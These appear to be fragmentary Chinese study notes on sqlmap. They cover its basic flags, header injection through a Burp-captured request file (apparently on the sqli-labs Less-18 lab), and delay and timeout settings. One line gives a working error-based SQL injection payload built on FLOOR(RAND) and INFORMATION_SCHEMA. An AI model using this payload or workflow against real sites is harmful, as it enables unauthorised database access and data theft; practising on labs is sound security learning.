SQLMAP的使用
基础使用
-- h 帮助
- u [是 get的方式]
id=1' AND (SELECT 8255 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(8255=8255,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'npKc'='npKc
- r
-
缓存路径
- r
多URL测试
- LESS-18
用burpsuite 抓包, 改数据包需要注入的地方为*, 然后使用
python sqlmap -r ./test.txt 进行 user-agent注入或者 referer进行注入
– delay
可以设定两个请求包之间的延时
– timeout
可以设定一个HTTP请求超过多少判定为延时
- level (sqlmap的情况下)